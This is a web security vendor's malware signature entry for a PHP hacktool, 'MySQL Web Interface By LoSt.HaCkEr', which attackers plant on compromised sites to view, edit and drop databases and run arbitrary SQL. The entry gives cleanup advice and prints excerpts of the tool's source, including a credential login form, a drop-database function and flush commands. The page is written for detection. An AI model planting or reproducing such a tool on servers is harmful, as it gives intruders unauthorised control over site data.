Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.sql_sniper_hex.002

php.hacktool.sql_sniper_hex.002

Many popular web applications such as WordPress, Joomla, vBulletin, osCommerce, etc. rely on database, specifically on MySql.
Most of the data those application work with is stored in the database. And quite a few applications store configuration information in database as well.
That's why hackers don't forget about it and try to exploit it as much as possible. For example, hackers inject spammy links and scripts directly into posts, stored in the database.
Or they chnage configuration records to make site redirect visitors to third-party sites. To work with MySql databases hackers use various scripts: from highly targeted
customized scripts that can do only one specific thing to scripts that provide access to broad MySql functionality, such as adminer scripts..

MySQL Web Interface By LoSt.HaCkEr is a simple interface that provides attackers with basic functionality: view, edit and delete databases and tables,
change user permissions, work with data and of course, execute arbitrary SQL queries.

Affecting

Any servers with enabled PHP and installed MySQL

Cleanup

Delete the malicious script and scan your server for other types of malware and specifically for backdoors.
You can also sign up with us and let our team remove the malware for you.

Dump

... excerpts ...

/*
* MySQL Web Interface By LoSt.HaCkEr
* -------------------------------
* Developed By sNiper_hEx
*/

...

function logon() {
global $PHP_SELF;

setcookie( "mysql_web_admin_username" );
setcookie( "mysql_web_admin_password" );
setcookie( "mysql_web_admin_hostname" );
echo "<html>n";
echo "<head>n";
echo "<title>MySQL New by LoSt.HaCkEr</title>n";
echo "</head>n";
echo "<body>n";
echo "<table width=100% height=100%><tr><td><center>n";
echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>n";
echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>n";
echo "<h1>MySQL Web by LoSt.HaCkEr</h1>n";
echo "<form action='$PHP_SELF'>n";
echo "<input type=hidden name=action value=logon_submit>n";
echo "<table cellpadding=5 cellspacing=1>n";
echo "<tr><td>Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>n";
echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>n";
echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>n";

...

function dropDatabase() {
global $mysqlHandle, $dbname, $PHP_SELF;

mysql_drop_db( $dbname, $mysqlHandle );
listDatabases();
}

function listTables() {
global $mysqlHandle, $dbname, $PHP_SELF;

echo "<h1>Tables List</h1>n";
echo "<p class=location>$dbname</p>n";
echoQueryResult();

...

echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>n";
if( $command == "flush_logs" ) {
if( mysql_query( "Flush logs" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>n";
if( $command == "flush_privileges" ) {
if( mysql_query( "Flush privileges" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>n";
if( $command == "flush_tables" ) {
if( mysql_query( "Flush tables" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>n";
if( $command == "flush_status" ) {
if( mysql_query( "Flush status" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";

...